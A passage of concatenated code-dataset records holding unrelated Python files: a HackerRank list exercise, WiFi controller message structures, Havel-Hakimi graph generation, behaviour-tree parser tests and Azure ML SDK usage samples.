\"insert\":\n# ls.insert(int(args[0]),int(args[1]))\n# case \"print\":\n# print(ls)\n# case \"remove\":\n# ls.remove(int(args[0]))\n# case \"append\":\n# ls.append(int(args[0]))\n# case \"sort\":\n# ls.sort()\n# case \"pop\":\n# ls.pop()\n# case \"reverse\":\n# ls.reverse()\n \n \n \nif __name__ == '__main__':\n ls = []\n N = int(input())\n for i in range(N):\n command,*args = input().split()\n if command == \"insert\":\n ls.insert(int(args[0]),int(args[1]))\n if command == \"print\":\n print(ls)\n if command == \"remove\":\n ls.remove(int(args[0]))\n if command == \"append\":\n ls.append(int(args[0]))\n if command == \"sort\":\n ls.sort()\n if command == \"pop\":\n ls.pop()\n if command == \"reverse\":\n ls.reverse()","repo_name":"ArslanAli4747/python_hacker_rank","sub_path":"lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40975749261","text":"from construct import Sequence\nfrom construct import Array\nfrom construct import Struct\nfrom construct import UBInt8\nfrom construct import UBInt16\nfrom construct import UBInt32\nfrom construct import Bytes\nfrom construct import Range\nfrom construct import BitStruct\nfrom construct import Bit\nfrom construct import Padding\n\n\nPT_VERSION = 0x00\n\nPT_BYE = 0x00\nPT_REGISTER = 0x01\nPT_LVAP_JOIN = 0x02\nPT_LVAP_LEAVE = 0x03\nPT_HELLO = 0x04\nPT_PROBE_REQUEST = 0x05\nPT_PROBE_RESPONSE = 0x06\nPT_AUTH_REQUEST = 0x07\nPT_AUTH_RESPONSE = 0x08\nPT_ASSOC_REQUEST = 0x09\nPT_ASSOC_RESPONSE = 0x10\nPT_ADD_LVAP = 0x11\nPT_DEL_LVAP = 0x12\nPT_STATUS_LVAP = 0x13\nPT_SET_PORT = 0x14\nPT_STATUS_PORT = 0x15\nPT_CAPS = 0x16\nPT_ADD_VAP = 0x31\nPT_DEL_VAP = 0x32\nPT_STATUS_VAP = 0x33\n\nHEADER = Struct(\"header\", UBInt8(\"version\"), UBInt8(\"type\"), UBInt16(\"length\"))\n\nSSIDS = Range(1, 10, Struct(\"ssids\", UBInt8(\"length\"),\n Bytes(\"ssid\", lambda ctx: ctx.length)))\n\nHELLO = Struct(\"hello\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n Bytes(\"wtp\", 6),\n UBInt32(\"period\"),\n UBInt32(\"uplink_bytes\"),\n UBInt32(\"downlink_bytes\"))\n\nPROBE_REQUEST = Struct(\"probe_request\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n Bytes(\"wtp\", 6),\n Bytes(\"sta\", 6),\n Bytes(\"hwaddr\", 6),\n UBInt8(\"channel\"),\n UBInt8(\"band\"),\n Bytes(\"ssid\", lambda ctx: ctx.length - 28))\n\nPROBE_RESPONSE = Struct(\"probe_response\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n Bytes(\"sta\", 6))\n\nAUTH_REQUEST = Struct(\"auth_request\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n Bytes(\"wtp\", 6),\n Bytes(\"sta\", 6),\n Bytes(\"bssid\", 6))\n\nAUTH_RESPONSE = Struct(\"auth_response\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n Bytes(\"sta\", 6),\n Bytes(\"bssid\", 6))\n\nASSOC_REQUEST = \\\n Struct(\"assoc_request\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n Bytes(\"wtp\", 6),\n Bytes(\"sta\", 6),\n Bytes(\"bssid\", 6),\n Bytes(\"ssid\", lambda ctx: ctx.length - 26))\n\nASSOC_RESPONSE = Struct(\"assoc_response\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n Bytes(\"sta\", 6))\n\nADD_LVAP = Struct(\"add_lvap\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n BitStruct(\"flags\", Padding(13),\n Bit(\"set_mask\"),\n Bit(\"associated\"),\n Bit(\"authenticated\")),\n UBInt16(\"assoc_id\"),\n Bytes(\"hwaddr\", 6),\n UBInt8(\"channel\"),\n UBInt8(\"band\"),\n Bytes(\"sta\", 6),\n Bytes(\"encap\", 6),\n Bytes(\"net_bssid\", 6),\n Bytes(\"lvap_bssid\", 6),\n SSIDS)\n\nDEL_LVAP = Struct(\"del_lvap\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n Bytes(\"sta\", 6))\n\nSTATUS_LVAP = Struct(\"status_lvap\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n BitStruct(\"flags\", Padding(13),\n Bit(\"set_mask\"),\n Bit(\"associated\"),\n Bit(\"authenticated\")),\n UBInt16(\"assoc_id\"),\n Bytes(\"wtp\", 6),\n Bytes(\"sta\", 6),\n Bytes(\"encap\", 6),\n Bytes(\"hwaddr\", 6),\n UBInt8(\"channel\"),\n UBInt8(\"band\"),\n Bytes(\"net_bssid\", 6),\n Bytes(\"lvap_bssid\", 6),\n SSIDS)\n\nCAPS_R = Sequence(\"blocks\",\n Bytes(\"hwaddr\", 6),\n UBInt8(\"channel\"),\n UBInt8(\"band\"),\n BitStruct(\"flags\", Padding(16)))\n\nCAPS_P = Sequence(\"ports\", Bytes(\"hwaddr\", 6),\n UBInt16(\"port_id\"),\n Bytes(\"iface\", 10))\n\nCAPS = Struct(\"caps\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n Bytes(\"wtp\", 6),\n UBInt8(\"nb_resources_elements\"),\n UBInt8(\"nb_ports_elements\"),\n Array(lambda ctx: ctx.nb_resources_elements, CAPS_R),\n Array(lambda ctx: ctx.nb_ports_elements, CAPS_P))\n\nSET_PORT = Struct(\"set_port\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n BitStruct(\"flags\", Padding(15),\n Bit(\"no_ack\")),\n Bytes(\"hwaddr\", 6),\n UBInt8(\"channel\"),\n UBInt8(\"band\"),\n Bytes(\"sta\", 6),\n UBInt16(\"rts_cts\"),\n UBInt8(\"tx_mcast\"),\n UBInt8(\"ur_mcast_count\"),\n UBInt8(\"nb_mcses\"),\n Array(lambda ctx: ctx.nb_mcses, UBInt8(\"mcs\")))\n\nSTATUS_PORT = Struct(\"status_port\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n BitStruct(\"flags\", Padding(15),\n Bit(\"no_ack\")),\n Bytes(\"wtp\", 6),\n Bytes(\"sta\", 6),\n Bytes(\"hwaddr\", 6),\n UBInt8(\"channel\"),\n UBInt8(\"band\"),\n UBInt16(\"rts_cts\"),\n UBInt8(\"tx_mcast\"),\n UBInt8(\"ur_mcast_count\"),\n UBInt8(\"nb_mcses\"),\n Array(lambda ctx: ctx.nb_mcses, UBInt8(\"mcs\")))\n\nADD_VAP = Struct(\"add_vap\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n Bytes(\"hwaddr\", 6),\n UBInt8(\"channel\"),\n UBInt8(\"band\"),\n Bytes(\"net_bssid\", 6),\n Bytes(\"ssid\", lambda ctx: ctx.length - 22))\n\nSTATUS_VAP = Struct(\"status_vap\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n Bytes(\"wtp\", 6),\n Bytes(\"hwaddr\", 6),\n UBInt8(\"channel\"),\n UBInt8(\"band\"),\n Bytes(\"net_bssid\", 6),\n Bytes(\"ssid\", lambda ctx: ctx.length - 28))\n\nPT_TYPES = {PT_BYE: None,\n PT_REGISTER: None,\n PT_LVAP_JOIN: None,\n PT_LVAP_LEAVE: None,\n PT_HELLO: HELLO,\n PT_PROBE_REQUEST: PROBE_REQUEST,\n PT_PROBE_RESPONSE: PROBE_RESPONSE,\n PT_AUTH_REQUEST: AUTH_REQUEST,\n PT_AUTH_RESPONSE: AUTH_RESPONSE,\n PT_ASSOC_REQUEST: ASSOC_REQUEST,\n PT_ASSOC_RESPONSE: ASSOC_RESPONSE,\n PT_ADD_LVAP: ADD_LVAP,\n PT_DEL_LVAP: DEL_LVAP,\n PT_STATUS_LVAP: STATUS_LVAP,\n PT_CAPS: CAPS,\n PT_SET_PORT: SET_PORT,\n PT_STATUS_PORT: STATUS_PORT,\n PT_STATUS_VAP: STATUS_VAP}\n\nPT_TYPES_HANDLERS = {PT_BYE: [],\n PT_REGISTER: [],\n PT_LVAP_JOIN: [],\n PT_LVAP_LEAVE: [],\n PT_HELLO: [],\n PT_PROBE_REQUEST: [],\n PT_PROBE_RESPONSE: [],\n PT_AUTH_REQUEST: [],\n PT_AUTH_RESPONSE: [],\n PT_ASSOC_REQUEST: [],\n PT_ASSOC_RESPONSE: [],\n PT_ADD_LVAP: [],\n PT_DEL_LVAP: [],\n PT_STATUS_LVAP: [],\n PT_CAPS: [],\n PT_SET_PORT: [],\n PT_STATUS_PORT: [],\n PT_STATUS_VAP: []}\n","repo_name":"herlesupreeth/Empcontroller","sub_path":"empower/lvapp/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24612468375","text":"import random\nfrom graphs import Vertex\nfrom graphs import Edge\nfrom graphs import Graph\nfrom drawGraph import drawVertexes\n\n\ndef canGraphBeCreatedFrom(sequence):\n \"\"\"\n Sprawdza czy mozna stworzyc graf z podanej listy stopni wierzcholkow\n na podstawie algorytmu Havel'a-Hakimi'ego\n \"\"\"\n if sum(sequence) % 2 == 1:\n return False\n\n while True:\n sequence = sorted(sequence, reverse=True)\n\n if sequence[0] == 0 and sequence[len(sequence) - 1] == 0:\n return True\n\n v = sequence[0]\n sequence = sequence[1:]\n\n if v > len(sequence):\n return False\n\n for i in range(v):\n sequence[i] -= 1\n\n if sequence[i] < 0:\n return False\n\n\ndef createGraphFromSequence(sequence):\n \"\"\"\n Tworzy graf z podanej listy stopni wierzcholkow\n jesli to niemozliwe zwraca None\n \"\"\"\n if not canGraphBeCreatedFrom(sequence):\n return None\n\n graph = Graph(False)\n\n vertexesAndSequenceCombined = []\n GET_VERTEX = 0\n GET_SEQUENCE = 1\n for i in range(len(sequence)):\n vertexesAndSequenceCombined.append([graph.addVertex(), sequence[i]])\n\n while True:\n vertexesAndSequenceCombined = sorted(vertexesAndSequenceCombined, reverse=True, key=lambda a: a[GET_SEQUENCE])\n\n if vertexesAndSequenceCombined[0][GET_SEQUENCE] == 0 and \\\n vertexesAndSequenceCombined[len(vertexesAndSequenceCombined) - 1][GET_SEQUENCE] == 0:\n return graph\n\n maximum = vertexesAndSequenceCombined[0][GET_SEQUENCE]\n\n for endVertex in range(1, 1 + maximum):\n graph.addEdge(vertexesAndSequenceCombined[0][GET_VERTEX],\n vertexesAndSequenceCombined[endVertex][GET_VERTEX])\n vertexesAndSequenceCombined[endVertex][GET_SEQUENCE] -= 1\n\n vertexesAndSequenceCombined = vertexesAndSequenceCombined[1:]\n\n\ndef canEdgesBeSwapped(graph: Graph, edge1: Edge, edge2: Edge):\n \"\"\"\n Sprawdza czy mozna zamienic pare krawedzi (ab, cd) na pare (ad, bc) bez zmieniania stopni wierzcholkow grafu\n \"\"\"\n if edge1.equals(edge2):\n return False\n\n aVertex = edge1.startVertex\n bVertex = edge1.endVertex\n\n cVertex = edge2.startVertex\n dVertex = edge2.endVertex\n\n if aVertex.equals(dVertex) or bVertex.equals(cVertex) \\\n or graph.findEdges(aVertex, dVertex) != None or graph.findEdges(dVertex, aVertex) != None \\\n or graph.findEdges(bVertex, cVertex) != None or graph.findEdges(cVertex, bVertex) != None:\n return False\n\n return True\n\n\ndef randomizeNotDirectedGraphWithoutChangingDegrees(graph: Graph, count: int = 10):\n \"\"\"\n Gdy to mozliwe, zamienia losowe krawedzie w grafie bez zmieniania stopni wierzcholkow i zwraca nowy graf\n \"\"\"\n newGraph = graph.copy()\n loopCount = 0\n MAX_LOOP = 1000\n for i in range(count):\n if loopCount > MAX_LOOP:\n return newGraph\n\n while True:\n if loopCount > MAX_LOOP:\n return newGraph\n loopCount += 1\n\n edgeLabel1, edge1 = random.choice(list(newGraph.edgeIndex.items()))\n edgeLabel2, edge2 = random.choice(list(newGraph.edgeIndex.items()))\n\n if canEdgesBeSwapped(graph, edge1, edge2):\n break\n\n aVertex = edge1.startVertex\n bVertex = edge1.endVertex\n\n cVertex = edge2.startVertex\n dVertex = edge2.endVertex\n\n edge1.removeMe()\n edge2.removeMe()\n\n newGraph.addEdge(aVertex, dVertex, edgeLabel1)\n newGraph.addEdge(bVertex, cVertex, edgeLabel2)\n\n return newGraph\n\n\ndef createK_RegularGraph(k: int, size: int = -1):\n if size == -1:\n size = random.randint(3, 8) * 2\n sequence = [k for i in range(size)]\n if not canGraphBeCreatedFrom(sequence):\n return None\n\n graph = createGraphFromSequence(sequence)\n return randomizeNotDirectedGraphWithoutChangingDegrees(graph)\n\n\n#######\n#\n# Tests\n#\n#######\n\ndef testSequence():\n print('\\nStarting testing creating from sequence\\n')\n\n sequence = [7, 7, 5, 4, 4, 4, 3, 3, 2, 1]\n assert canGraphBeCreatedFrom(sequence) == True\n graph = createGraphFromSequence(sequence)\n assert graph != None\n print('First graph:\\n', graph, '\\n')\n\n sum = 0\n for i in range(100):\n secondGraph = randomizeNotDirectedGraphWithoutChangingDegrees(graph)\n thirdGraph = randomizeNotDirectedGraphWithoutChangingDegrees(secondGraph)\n sum += 0 if graph.equals(secondGraph) else 1\n sum += 0 if secondGraph.equals(thirdGraph) else 1\n assert sum >= 198\n\n print('Second graph:\\n', secondGraph, '\\n')\n\n sequence = [8, 4, 6, 5, 2, 1, 2, 3, 4, 4, 2, 1]\n\n assert canGraphBeCreatedFrom(sequence) == True\n graph = createGraphFromSequence(sequence)\n assert graph != None\n\n sequence = [10, 2, 3, 6, 3, 7, 9]\n assert canGraphBeCreatedFrom(sequence) == False\n graph = createGraphFromSequence(sequence)\n assert graph == None\n\n print('\\nFinished\\n')\n\n\ndef testK_Regular():\n print('\\nStarting testing k regular graphs\\n')\n graph = createK_RegularGraph(3, 6)\n secondGraph = createK_RegularGraph(3, 6)\n print('First graph:\\n', graph, '\\n')\n print('Second graph:\\n', secondGraph, '\\n')\n print('\\nFinished\\n')\n\n\nif __name__ == \"__main__\":\n testSequence()\n testK_Regular()\n","repo_name":"pawel2000pl/GrafyLab","sub_path":"set2_tasks-1-2-5.py","file_name":"set2_tasks-1-2-5.py","file_ext":"py","file_size_in_byte":5350,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"23818044252","text":"import unittest\nfrom ..parser import Parser\nfrom ..node import NodeType\n\n\nclass TestParser(unittest.TestCase):\n def setUp(self):\n pass\n\n def test_parse_one_action(self):\n root = Parser.parse(\"\"\"\n action\n \"\"\")[0]\n assert(root.type == NodeType.ACTION_CONDITION)\n assert(root.action == \"action\")\n\n def test_fail_action(self):\n self.assertRaises(SyntaxWarning, Parser.parse, \"\"\"\n on_\"!#e\n \"\"\")\n\n def test_underscore_action(self):\n node = Parser.parse(\"one_action\")[0]\n assert node.type == NodeType.ACTION_CONDITION\n assert len(node.children) == 0\n\n def test_parse_two_actions(self):\n roots = Parser.parse(\"\"\"\n one\n two\n \"\"\")\n assert(len(roots)==2)\n assert(roots[0].type == NodeType.ACTION_CONDITION)\n assert(roots[1].type == NodeType.ACTION_CONDITION)\n assert(roots[0].action == \"one\")\n assert(roots[1].action == \"two\")\n\n def test_simple_sequence(self):\n root = Parser.parse(\"\"\"\n >\n one\n <\n \"\"\")[0]\n self.assertIs(root.type, NodeType.SEQUENCE)\n self.assertIs(len(root.children), 1)\n self.assertIs(root.children[0].type, NodeType.ACTION_CONDITION)\n\n def test_fail_sequence(self):\n self.assertRaises(SyntaxWarning, Parser.parse, \"\"\"\n >\n one\n \"\"\")\n\n def test_two_sequences(self):\n roots = Parser.parse(\"\"\"\n >\n one\n <\n >\n two\n <\n \"\"\")\n for i in xrange(0,2):\n self.assertIs(roots[i].type, NodeType.SEQUENCE)\n self.assertIs(len(roots[i].children), 1)\n self.assertIs(roots[i].children[0].type, NodeType.ACTION_CONDITION)\n\n def test_nested_sequences(self):\n root = Parser.parse(\"\"\"\n >\n >\n two\n <\n <\n \"\"\")[0]\n assert(root.type == NodeType.SEQUENCE)\n assert(root.children[0].type == NodeType.SEQUENCE)\n assert(root.children[0].children[0].type == NodeType.ACTION_CONDITION)\n\n def test_prio(self):\n root = Parser.parse(\"\"\"\n ?\n one\n !\n \"\"\")[0]\n assert(root.type == NodeType.PRIORITY)\n assert(len(root.children) == 1)\n assert(root.children[0].type == NodeType.ACTION_CONDITION)\n assert(root.children[0].action == \"one\")\n\n def test_two_prio(self):\n roots = Parser.parse(\"\"\"\n ?\n one\n !\n ?\n two\n !\n \"\"\")\n for i in xrange(0,2):\n self.assertIs(roots[i].type, NodeType.PRIORITY)\n self.assertIs(len(roots[i].children), 1)\n self.assertIs(roots[i].children[0].type, NodeType.ACTION_CONDITION)\n\n def test_nested_prio(self):\n root = Parser.parse(\"\"\"\n ?\n ?\n two\n !\n !\n \"\"\")[0]\n assert(root.type == NodeType.PRIORITY)\n assert(root.children[0].type == NodeType.PRIORITY)\n assert(root.children[0].children[0].type == NodeType.ACTION_CONDITION)\n\n def test_fail_prio(self):\n self.assertRaises(SyntaxWarning, Parser.parse, \"\"\"\n ?\n one\n \"\"\")\n\n def test_simple_parallel(self):\n root = Parser.parse(\"\"\"\n //\n one\n two\n \\\\\\\\\n \"\"\")[0]\n assert root.type == NodeType.PARALLEL\n assert len(root.children) == 2\n assert root.parallelSuccessCount == 2\n\n def test_simple_parallel_with_success_count(self):\n root = Parser.parse(\"\"\"\n /1/\n one\n two\n \\\\\\\\\n \"\"\")[0]\n assert root.type == NodeType.PARALLEL\n assert len(root.children) == 2\n assert root.parallelSuccessCount == 1\n\n def test_two_parallel(self):\n roots = Parser.parse(\"\"\"\n /1/\n one\n two\n \\\\\\\\\n //\n one\n two\n \\\\\\\\\n \"\"\")\n assert roots[0].type == NodeType.PARALLEL\n assert roots[1].type == NodeType.PARALLEL\n assert len(roots[0].children) == 2\n assert len(roots[1].children) == 2\n assert roots[0].parallelSuccessCount == 1\n assert roots[1].parallelSuccessCount == 2\n\n def test_simple_comment(self):\n root = Parser.parse(\"\"\"\n # comment\n action\n \"\"\")[0]\n assert root.type == NodeType.ACTION_CONDITION\n assert len(root.children) == 0\n\n def test_simple_same_line_comment(self):\n roots = Parser.parse(\"\"\"\n action # comment same line\n action_below\n \"\"\")\n assert roots[0].type == NodeType.ACTION_CONDITION\n assert len(roots[0].children) == 0\n\n def test_parse_full(self):\n root = Parser.parse(\"\"\"\n >\n one\n two\n ?\n three\n four\n !\n /2/\n parallelone\n paralleltwo\n \\\\\\\\\n //\n parallelthree\n parallelfour\n \\\\\\\\\n # dat comment\n ?\n five\n six\n !\n # moar comments\n <\n \"\"\")[0]\n assert(root.type == NodeType.SEQUENCE)\n\n def test_parse_with_subfile(self):\n root = Parser.parse(\"\"\"\n >\n first\n :pybt/tests/test.bt\n <\n \"\"\")[0]\n assert root.type == NodeType.SEQUENCE\n assert len(root.children) == 2\n test_bt = root.children[1]\n assert len(test_bt.children) == 4\n assert test_bt.type == NodeType.SEQUENCE\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"antonklava/PyBT","sub_path":"tests/test_parser.py","file_name":"test_parser.py","file_ext":"py","file_size_in_byte":5076,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"3578508332","text":"import os\n\nfrom ml_samples_compute import handle_resource_exists_error\n\nfrom azure.ai.ml import MLClient\nfrom azure.identity import DefaultAzureCredential\n\nsubscription_id = os.environ[\"AZURE_SUBSCRIPTION_ID\"]\nresource_group = os.environ[\"RESOURCE_GROUP_NAME\"]\nworkspace_name = \"test-ws1\"\ncredential = DefaultAzureCredential()\nml_client = MLClient(credential, subscription_id, resource_group, workspace_name=workspace_name)\n\nimport uuid\n\njob_name = f\"iris-dataset-job-{str(uuid.uuid4())}\"\n\n\nclass MiscConfigurationOptions(object):\n def ml_misc_config_0(self):\n # [START job_operations_create_and_update]\n from azure.ai.ml import load_job\n\n created_job = ml_client.jobs.create_or_update(\n name=job_name,\n job=load_job(\n \"./sdk/ml/azure-ai-ml/tests/test_configs/command_job/command_job_test_local_env.yml\",\n params_override=[{\"name\": job_name}, {\"compute\": \"cpucluster\"}],\n ),\n )\n # [END job_operations_create_and_update]\n\n # [START job_operations_list]\n from azure.ai.ml._restclient.v2023_04_01_preview.models import ListViewType\n\n list_of_jobs = ml_client.jobs.list(parent_job_name=job_name, list_view_type=ListViewType.ARCHIVED_ONLY)\n # [END job_operations_list]\n\n # [START job_operations_get]\n retrieved_job = ml_client.jobs.get(job_name)\n # [END job_operations_get]\n\n # [START job_operations_cancel]\n cancel_poller = ml_client.jobs.begin_cancel(job_name)\n print(cancel_poller.result())\n # [END job_operations_cancel]\n\n # [START job_operations_validate]\n from azure.ai.ml import load_job\n from azure.ai.ml.entities import PipelineJob\n\n pipeline_job: PipelineJob = load_job(\n \"./sdk/ml/azure-ai-ml/tests/test_configs/pipeline_jobs/invalid/combo.yml\",\n params_override=[{\"name\": job_name}, {\"compute\": \"cpucluster\"}],\n )\n print(ml_client.jobs.validate(pipeline_job).error_messages)\n # [END job_operations_validate]\n\n # [START job_operations_archive]\n ml_client.jobs.archive(name=job_name)\n # [END job_operations_archive]\n\n # [START job_operations_restore]\n ml_client.jobs.restore(name=job_name)\n # [END job_operations_restore]\n\n # [START job_operations_stream_logs]\n running_job = ml_client.jobs.create_or_update(\n load_job(\n \"./sdk/ml/azure-ai-ml/tests/test_configs/command_job/command_job_test_local_env.yml\",\n params_override=[{\"name\": job_name}, {\"compute\": \"cpucluster\"}],\n )\n )\n ml_client.jobs.stream(running_job.name)\n # [END job_operations_stream_logs]\n\n # [START job_operations_download]\n ml_client.jobs.download(name=job_name, download_path=\"./job-1-logs\", all=True)\n # [END job_operations_download]\n\n # [START model_entity_create]\n from azure.ai.ml.entities import Model\n\n model = Model(\n name=\"model1\",\n version=\"5\",\n description=\"my first model in prod\",\n path=\"models/very_important_model.pkl\",\n properties={\"prop1\": \"value1\", \"prop2\": \"value2\"},\n type=\"mlflow_model\",\n flavors={\n \"sklearn\": {\"sklearn_version\": \"0.23.2\"},\n \"python_function\": {\"loader_module\": \"office.plrmodel\", \"python_version\": 3.6},\n },\n stage=\"Production\",\n )\n # [END model_entity_create]\n\n # [START model_batch_deployment_settings_entity_create]\n from azure.ai.ml.entities._deployment.model_batch_deployment_settings import ModelBatchDeploymentSettings\n\n modelBatchDeploymentSetting = ModelBatchDeploymentSettings(\n mini_batch_size=256,\n instance_count=5,\n max_concurrency_per_instance=2,\n output_file_name=\"output-file-name\",\n environment_variables={\"env1\": \"value1\", \"env2\": \"value2\"},\n error_threshold=2,\n logging_level=1,\n )\n # [END model_batch_deployment_settings_entity_create]\n\n # [START model_configuration_entity_create]\n from azure.ai.ml.entities._assets._artifacts._package.model_configuration import ModelConfiguration\n\n modelConfiguration = ModelConfiguration(mode=\"model-mode\", mount_path=\"model-mount-path\")\n # [END model_configuration_entity_create]\n\n # [START model_package_input_entity_create]\n from azure.ai.ml.entities._assets._artifacts._package.model_package import ModelPackageInput\n\n modelPackageInput = ModelPackageInput(type=\"input-type\", mode=\"input-mode\", mount_path=\"input-mount-path\")\n # [END model_package_input_entity_create]\n\n # [START model_package_entity_create]\n from azure.ai.ml.entities import AzureMLOnlineInferencingServer, CodeConfiguration, ModelPackage\n\n modelPackage = ModelPackage(\n inferencing_server=AzureMLOnlineInferencingServer(\n code_configuration=CodeConfiguration(code=\"../model-1/foo/\", scoring_script=\"score.py\")\n ),\n target_environment_name=\"env-name\",\n target_environment_version=\"1.0\",\n environment_variables={\"env1\": \"value1\", \"env2\": \"value2\"},\n tags={\"tag1\": \"value1\", \"tag2\": \"value2\"},\n )\n # [END model_package_entity_create]\n\n # [START create_inputs_outputs]\n from azure.ai.ml import Input, Output\n from azure.ai.ml.entities import CommandJob, CommandJobLimits\n\n command_job = CommandJob(\n code=\"./src\",\n command=\"python train.py --ss {search_space.ss}\",\n inputs={\n \"input1\": Input(path=\"trial.csv\", mode=\"ro_mount\", description=\"trial input data\"),\n \"input_2\": Input(\n path=\"azureml:list_data_v2_test:2\", type=\"uri_folder\", description=\"registered data asset\"\n ),\n },\n outputs={\"default\": Output(path=\"./foo\")},\n compute=\"trial\",\n environment=\"AzureML-sklearn-1.0-ubuntu20.04-py38-cpu:33\",\n limits=CommandJobLimits(timeout=120),\n )\n # [END create_inputs_outputs]\n\n # [START load_job]\n from azure.ai.ml import load_job\n\n job = load_job(source=\"./sdk/ml/azure-ai-ml/tests/test_configs/command_job/command_job_test_local_env.yml\")\n # [END load_job]\n\n # [START load_model]\n from azure.ai.ml import load_model\n\n model = load_model(\n source=\"./sdk/ml/azure-ai-ml/tests/test_configs/model/model_with_stage.yml\",\n params_override=[{\"name\": \"new_model_name\"}, {\"version\": \"1\"}],\n )\n # [END load_model]\n\n # [START load_model_package]\n from azure.ai.ml import load_model_package\n\n model_package = load_model_package(\n \"./sdk/ml/azure-ai-ml/tests/test_configs/model_package/model_package_simple.yml\"\n )\n # [END load_model_package]\n\n # [START tensorflow_distribution_configuration]\n from azure.ai.ml import TensorFlowDistribution\n from azure.ai.ml.entities import CommandComponent\n\n component = CommandComponent(\n name=\"microsoftsamples_tf\",\n description=\"This is the TF command component\",\n inputs={\n \"component_in_number\": {\"description\": \"A number\", \"type\": \"number\", \"default\": 10.99},\n \"component_in_path\": {\"description\": \"A path\", \"type\": \"uri_folder\"},\n },\n outputs={\"component_out_path\": {\"type\": \"uri_folder\"}},\n command=\"echo Hello World & echo ${{inputs.component_in_number}} & echo ${{inputs.component_in_path}} \"\n \"& echo ${{outputs.component_out_path}}\",\n environment=\"AzureML-sklearn-1.0-ubuntu20.04-py38-cpu:33\",\n distribution=TensorFlowDistribution(\n parameter_server_count=1,\n worker_count=2,\n ),\n instance_count=2,\n )\n # [END tensorflow_distribution_configuration]\n\n # [START pytorch_distribution_configuration]\n from azure.ai.ml import PyTorchDistribution\n from azure.ai.ml.entities import CommandComponent\n\n component = CommandComponent(\n name=\"microsoftsamples_torch\",\n description=\"This is the PyTorch command component\",\n inputs={\n \"component_in_number\": {\"description\": \"A number\", \"type\": \"number\", \"default\": 10.99},\n \"component_in_path\": {\"description\": \"A path\", \"type\": \"uri_folder\"},\n },\n outputs={\"component_out_path\": {\"type\": \"uri_folder\"}},\n command=\"echo Hello World & echo ${{inputs.component_in_number}} & echo ${{inputs.component_in_path}} \"\n \"& echo ${{outputs.component_out_path}}\",\n environment=\"AzureML-sklearn-1.0-ubuntu20.04-py38-cpu:33\",\n distribution=PyTorchDistribution(\n process_count_per_instance=2,\n ),\n instance_count=2,\n )\n # [END pytorch_distribution_configuration]\n\n # [START mpi_distribution_configuration]\n from azure.ai.ml import MpiDistribution\n from azure.ai.ml.entities import CommandComponent\n\n component = CommandComponent(\n name=\"microsoftsamples_mpi\",\n description=\"This is the MPI command component\",\n inputs={\n \"component_in_number\": {\"description\": \"A number\", \"type\": \"number\", \"default\": 10.99},\n \"component_in_path\": {\"description\": \"A path\", \"type\": \"uri_folder\"},\n },\n outputs={\"component_out_path\": {\"type\": \"uri_folder\"}},\n command=\"echo Hello World & echo ${{inputs.component_in_number}} & echo ${{inputs.component_in_path}} \"\n \"& echo ${{outputs.component_out_path}}\",\n environment=\"AzureML-sklearn-1.0-ubuntu20.04-py38-cpu:33\",\n distribution=MpiDistribution(\n process_count_per_instance=2,\n ),\n instance_count=2,\n )\n # [END mpi_distribution_configuration]\n\n # [START code_configuration]\n from azure.ai.ml.entities import BatchDeployment, CodeConfiguration\n\n deployment = BatchDeployment(\n name=\"non-mlflow-deployment\",\n description=\"this is a sample non-mlflow deployment\",\n endpoint_name=\"my-batch-endpoint\",\n model=model,\n code_configuration=CodeConfiguration(\n code=\"configs/deployments/model-2/onlinescoring\", scoring_script=\"score1.py\"\n ),\n environment=\"env\",\n compute=\"cpu-cluster\",\n instance_count=2,\n max_concurrency_per_instance=2,\n mini_batch_size=10,\n output_file_name=\"predictions.csv\",\n )\n # [END code_configuration]\n\n # [START intellectual_property_configuration]\n from azure.ai.ml.constants import IPProtectionLevel\n from azure.ai.ml.entities import CommandComponent, IntellectualProperty\n\n component = CommandComponent(\n name=\"random_name\",\n version=\"1\",\n environment=\"azureml:AzureML-Minimal:1\",\n command=\"echo hello\",\n intellectual_property=IntellectualProperty(publisher=\"contoso\", protection_level=IPProtectionLevel.ALL),\n )\n # [END intellectual_property_configuration]\n\n # [START personal_access_token_configuration]\n from azure.ai.ml.entities import PatTokenConfiguration, WorkspaceConnection\n\n ws_connection = WorkspaceConnection(\n target=\"my_target\",\n type=\"python_feed\",\n credentials=PatTokenConfiguration(pat=\"abcdefghijklmnopqrstuvwxyz\"),\n name=\"my_connection\",\n metadata=None,\n )\n # [END 